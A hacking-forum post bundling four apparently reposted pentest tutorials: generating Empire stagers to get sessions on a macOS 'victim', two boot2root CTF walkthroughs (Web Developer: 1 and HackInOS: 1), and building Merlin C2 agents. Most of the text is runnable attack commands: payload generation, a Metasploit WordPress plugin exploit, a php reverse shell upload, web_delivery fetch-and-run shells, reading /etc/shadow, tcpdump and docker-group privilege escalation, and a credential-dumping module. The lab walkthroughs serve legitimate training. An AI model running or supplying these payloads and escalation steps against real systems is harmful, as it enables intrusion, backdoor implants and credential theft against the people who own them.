Login

**NINZA** · 05-14-2020, 11:55 AM

0			0

In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.

Table of Content :

osx/macho
osx/applescript
osx/launcher
osx/jar
osx/safari_launcher

osx/macho

The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.
The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:
usestager osx/macho
set Listener http
set OutFile shell.macho
execute
1
2
3
4
usestager osx/macho
set Listener http
set OutFile shell.macho
execute
As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :
[Image: 1.png?w=687]

osx/applescript
The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :
usestager osx/applescript
set Listener http
execute
1
2
3
usestager osx/applescript
set Listener http
execute
[Image: 2.png?w=687]

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :
[Image: 3.1.png?w=687]

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :
[Image: 3.png?w=687]

osx/launcher
The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :
usestager osx/launcher
execute
1
2
usestager osx/launcher
execute
copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :
[Image: 4.png?w=687]

osx/jar
The nest stager which we will use is osx/jar. This stager creates a jar file which is a Java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :
usestager osx/jar
set Listener http
set OutFile out.jar
execute
1
2
3
4
usestager osx/jar
set Listener http
set OutFile out.jar
execute
The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :
[Image: 5.png?w=687]

osx/safari_launcher
The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:
usestager osx/safari_launcher
set Listener http
execute
1
2
3
usestager osx/safari_launcher
set Listener http
execute
Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :
[Image: 6.png?w=687]

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

Hello friends! Today we are going to take another boot2root challenge known as “Web Developer: 1”. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Intermediate
Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTP service port
Enumerating directories using Dirb
Finding “cap” file
Analyzing the “cap” file and finding WordPress password
Installing the vulnerable plugin in WordPress
Exploiting the vulnerable to get a reverse shell
Finding SSH login and password
Finding application is a sudoers list
Getting flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target –> 192.168.19.131
Our next step is to scan our target with nmap.
nmap -p- -sV 192.168.19.131
1
nmap -p- -sV 192.168.19.131
[Image: 2.png?w=687&ssl=1]

From the NMAP Version Scan we enumerated the following details:
22 Port having the SSH service and 80 Port having HTTP service.
As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.
[Image: 3.png?w=687&ssl=1]

As we couldn’t find any links on this page. So, we will do a directory bruteforcing using dirb scan. From the scanning result, we choose the highlighted directory for further enumeration.
[Image: 4.png?w=687&ssl=1]

So, we opened this directory in the browser and found a cap file.
[Image: 5.png?w=687&ssl=1]

We will open cap file in Wireshark, and you can see that we found the username and password through it.
[Image: 7.png?w=687&ssl=1]

And using the above username and password, you can directly log on to the website. As you can see that the website is in WordPress. And I remember that there is a plug-in of WordPress that is vulnerable. So, in the plugin I added a new plugin i.e. ReFlex Gallery as you can in the image below:
[Image: 8.png?w=687&ssl=1]

Now, we will use the in-build exploit from Metasploit to exploit this plugin and get a session. And for this, we use the following set of commands:
use exploit/unix/wepapp/wp_reflexgallery_file_upload
set rhosts 192.168.19.131
exploit
1
2
3
use exploit/unix/wepapp/wp_reflexgallery_file_upload
set rhosts 192.168.19.131
exploit
[Image: 9.png?w=687&ssl=1]

Once we got the session, I navigated through it a lot and found the wp-config.php, now, when reading the config file, we find username and password.
[Image: 11.png?w=687&ssl=1]

Now we find credentials inside the file, we use this credential to log in through SSH. After logging in we check the sudoers list and find we can run “tcpdump” as the root user.
ssh [email protected]
sudo -l
1
2
ssh [email protected]
sudo -l
[Image: 12.png?w=687&ssl=1]

So, we can execute a file using tcpdump, so we use the following command to execute “ls -al /root” command. Now the command will be executed only when tcpdump captures a packet.
COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
1
2
3
4
5
COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
[Image: 13.1.png?w=687&ssl=1]

After starting tcpdump, in a new terminal, we connect to the target machine through SSH. Now we send a TCP packet to the 127.0.0.1 using netcat. We had to use this locally as we started tcpdump on the loopback interface.
nc -v -z -n -w 1 127.0.0.1 1
1
nc -v -z -n -w 1 127.0.0.1 1

As soon as we send the packet, our command is executed and we can see all the files inside “/root” directory. Inside “/root” directory, we find a file called “flag.txt”. We are again going to use tcpdump command to open “flag.txt” and are able to get the final flag.
COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
1
2
3
4
5
COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
[Image: 14.png?w=687&ssl=1]

Hello friends! Today we are going to take another boot2root challenge known as “HackInOS: 1”. The credit for making this VM machine goes to “Fatih Çelik” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Intermediate
Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTP service port
Finding upload directory
Finding source code for a web application
Getting reverse shell
Pivoting using Metasploit
Logging in through MySQL and find an SSH credentials
Logging in through SSH
Getting the root shell and finding the flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target –> 192.168.1.101
Our next step is to scan our target with nmap.
nmap -p- -sV 192.168.1.101
1
nmap -p- -sV 192.168.1.101
[Image: 2.png?w=687&ssl=1]

The NMAP output shows us that there are 2 ports open: 22(SSH), 8000(HTTP)
We find that port 8000 is running HTTP, so we open the IP in our browser and find there is WordPress CMS running on the web server.
[Image: 3.png?w=687&ssl=1]

We don’t find any vulnerable plugin or theme on the CMS, so we run a dirb scan to enumerate the directories on the target machine.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

Dirb scan gave us “robots.txt”, we open it and find a link to “upload.php” and “/uploads”.
[Image: 5.png?w=687&ssl=1]

We open upload.php and find a page where we can upload images. Here we try to upload an image and get a smiling face, it looks like it means there is an error uploading the file.
[Image: 6.png?w=687&ssl=1]

We open the source code of the web page and inside a comment we find a GitHub link.
[Image: 7.png?w=687&ssl=1]

We open the GitHub link and find there is a source code for the upload.php file.
[Image: 8.png?w=687&ssl=1]

Now to upload the image we just need to add “GIF98” to the start of the php reverse shellcode we want to upload.
[Image: 9.png?w=687&ssl=1]

Now when we upload our php reverse shell, we are successfully able to upload the shell. But we do not know the filename after it is uploaded on the server.
[Image: 10.png?w=687&ssl=1]

Taking a look at the source code of “upload.php” we find that after the shell is uploaded the file gets renamed to “md5(<filename><random number )between 1 – 100>.<file extension>”. So, we create a python script that creates a text file filled with all the 100 md5 filename. You can download the script from

[To see content please register here]

.

Now we run the python script and use dirb to bruteforce the new file name.
dirb

[To see content please register here]

dict.txt
1
dirb

[To see content please register here]

dict.txt

We set up the listener, and again run the dirb command again and get a reverse shell.
nc -lvp 1234
dirb

[To see content please register here]

dict.txt
1
2
nc -lvp 1234
dirb

[To see content please register here]

dict.txt
After getting a reverse shell, we spawn a TTY shell and we find that we are inside a Docker container. We find all files with SUID bit set and find that “tail” command has SUID bit set. So, we use the “tail” command to open “/etc/shadow”.
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
tail -c1G /etc/shadow
1
2
3
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
tail -c1G /etc/shadow
[Image: 13.png?w=687&ssl=1]

We get the password for “root” user from /etc/shadow file and we copy and save it in our system. We crack the hash using john the ripper and find the password to be “john”.
john hash
1
john hash
[Image: 14.png?w=687&ssl=1]

After finding the password, we switch to the root user. After becoming a root user, we switch to “/root” directory and find a file called “flag”. We open the “flag” file and find nothing useful.
[Image: 15.png?w=687&ssl=1]

Further enumerating the system, inside /var/www/html/wp-config.php. We open the username and password for database login. There is no MySQL service running on the machine and we are also not able to login through SSH using these credentials.
[Image: 14.1.png?w=687&ssl=1]

Getting back inside /root directory, we find a file called “.port”. We open the file and find a hint to look for other containers.
[Image: 16.png?w=687&ssl=1]

To further interact with the shell, we get a meterpreter reverse shell. We use the web_delivery module in Metasploit-framework to get a reverse shell.
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > setg lhost eth0
msf5 exploit(multi/script/web_delivery) > setg lport 8888
msf5 exploit(multi/script/web_delivery) > run
1
2
3
4
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > setg lhost eth0
msf5 exploit(multi/script/web_delivery) > setg lport 8888
msf5 exploit(multi/script/web_delivery) > run
[Image: 17.png?w=687&ssl=1]

We copy the command provided by web_delivery module and run it on the target machine.
[Image: 18.png?w=687&ssl=1]

As soon as we run the command on the target machine, we get a reverse shell. After getting a reverse shell, we use autoroute module in Metasploit-framework for pivoting.
msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit
1
2
3
msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit
Then we use the ping_sweep module to find all the machines on the new network.
msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit
1
2
3
4
msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit
Then we run a portscan module to find all the ports on all the machines.
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit
1
2
3
4
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit
We find the following ports open on the following machines:
172.18.0.1
22,8000
172.18.0.2
80
172.18.0.3
3306
172.18.0.4
2021
[Image: 19.png?w=687&ssl=1]

As we know port 3306 is for MySQL service and we also have username and password for WordPress database. So, we can login through MySQL on target “172.18.0.3” and use credentials “wordpress:wordpress”.
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
mysql -u wordpress -p wordpress -h 172.18.0.3
1
2
3
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
mysql -u wordpress -p wordpress -h 172.18.0.3
After logging in we check all the databases on the MySQL server.
show databases;
1
show databases;
[Image: 20.png?w=687&ssl=1]

We now check all the tables available on the database and find a table called “host_ssh_cred”. We check the columns inside the table and find the username and hash of a password.
show tables;
select * from host_ssh_cred;
1
2
show tables;
select * from host_ssh_cred;
[Image: 21.png?w=687&ssl=1]

We save the hash in our system and use john the ripper to crack the hash
john --format=RAW-md5 sshpass
1
john --format=RAW-md5 sshpass
[Image: 22.png?w=687&ssl=1]

Now we have the credentials for SSH; hummingbird:123456. We login through SSH and now when we run the id command, we find that we are a member of the docker group. Some containers have a dedicated group to allow unprivileged users to manage their containers without having to escalate their privileges. To exploit this vulnerability, we first need to check the docker images that are available.
ssh [email protected]
id
docker images
1
2
3
ssh [email protected]
id
docker images
[Image: 23.png?w=687&ssl=1]

We find that the Ubuntu image is available to us, so we use this to create a new docker container and mount the / directory of the host inside a folder called /root. After we run the docker image we go to /root/root and find a file called “flag”. When we open the file, we find our congratulatory flag.
docker run -v /:/root -i -t ubuntu /bin/bash
cd /root
cd root
cat flag
1
2
3
4
docker run -v /:/root -i -t ubuntu /bin/bash
cd /root
cd root
cat flag
[Image: 24.png?w=687&ssl=1]

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.
Table of content:

Introduction
Installation
Windows exploitation
Windows post exploitation
Linux exploitation
Linux post exploitation

Introduction
Merlin is a great cross-platform Command and control tool written in the Go language. It’s made of two elements i.e. the server and agent. It works on the HTTP/2 protocol. The best things about Merlin are that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us put agents on any platform/machine we come across and we can listen to it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.
The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using the Merlin server. Any binary file is executed with the target’s path variable.
Installation
Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for Merlin to work. So, to install the Go language type:
apt install golang
1
apt install golang
And then to install merlin the following commands:
mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
1
2
mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
[Image: 1.png?w=687]

Once the above commands are executed successfully, use the following command to unzip merlin server.
7z x merlinServer-Linux-x64-v0.1.4.7z
1
7z x merlinServer-Linux-x64-v0.1.4.7z
[Image: 2.png?w=687]

Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:
./merlinServer-Linux-x64
1
./merlinServer-Linux-x64
[Image: 3.png?w=687]

In “README.MD”, we find the instructions for installing “Merlin” in our system.
[Image: 4.png?w=687]

Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:
echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
1
2
3
echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
Once the directory is downloaded, let’s check its contents using cd and ls commands.
[Image: 5.png?w=687]

There was a cmd directory, and in it, there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :
go run main.go
1
go run main.go
[Image: 6.png?w=687]

As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:
[Image: 7.png?w=687]

Now if you run merlin using the command: go run main.go, merlin server will run successfully.
[Image: 8.png?w=687]

Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:
go run main.go -h
1
go run main.go -h
[Image: 9.png?w=687]

Windows exploitation
Now, to make Merlin agent for windows type the following command:
GOOS=windows GOARCH=amd64 go build -ldlags "-X main.url=//192.168.0.11:443" -o shell.exe main.go
1
GOOS=windows GOARCH=amd64 go build -ldlags "-X main.url=//192.168.0.11:443" -o shell.exe main.go
Now, share the shell with the target using the python server:
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 10.png?w=687]

In order to create a listener for the shell to revert, use the following command:
go run main.go -i 192.168.0.11
1
go run main.go -i 192.168.0.11
[Image: 12.png?w=687]

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:
[Image: 13.png?w=687]

Type sessions to see the list of the sessions you acquire as shown in the image below:
[Image: 14.png?w=687]

To access than an available session uses the following command:
interact <session name>
1
interact <session name>
[Image: 15.png?w=687]

As you have accessed the session, here you can use windows commands such as:
shell ipconfig
1
shell ipconfig
[Image: 16.png?w=687]

Then further you can use various post exploitation modules, list of which are shown in the image below:
[Image: 17.png?w=687]

Windows post exploitation
We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:
use module windows/x64/powershell/credentials/dumpCredStore
1
use module windows/x64/powershell/credentials/dumpCredStore
[Image: 18.png?w=687]

As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So, therefore, let’s set the options:
set agent <agent name>
run
1
2
set agent <agent name>
run
[Image: 19.png?w=687]

Linux exploitation
Now, we will make a merlin agent for Linux machine. For this, simply type the following command:
Export GOOS=linux;export GOARCH=amd64; go build -ldflags "-s -w -X main.url=//192.168.0.11:443" -o shell.elf main.go
1
Export GOOS=linux;export GOARCH=amd64; go build -ldflags "-s -w -X main.url=//192.168.0.11:443" -o shell.elf main.go
Once the command is executed, your malware will be created. Use the python to share the file with the victim as shown in the image below or however see it fit. For starting python HTTP server:
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 20.png?w=687]

Setup the listener and wait for the file to get executed.
go run main.go -I 192.168.0.11
1
go run main.go -I 192.168.0.11
[Image: 22.png?w=687]

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.
[Image: 23.png?w=687]

Then to access the session use the following command:
interact <session name>
1
interact <session name>
[Image: 24.png?w=687]

Then further you can use any Linux command such as:
shell ls
1
shell ls
[Image: 25.png?w=687]

Linux post exploitation
Even in Linux, you can further use a number of post-exploitation modules. The one we will be using in this article is privesc/LinEnum:
use module linux/x64/bash/priesc/LinEnum
1
use module linux/x64/bash/priesc/LinEnum
[Image: 26.png?w=687]

Through info command, we know that we have to give a session in order to run this module. So, type:

set agent <session name>
run
1
2
set agent <session name>
run
[Image: 27.png?w=687]

And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how convenient it is crossed-platformed.

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis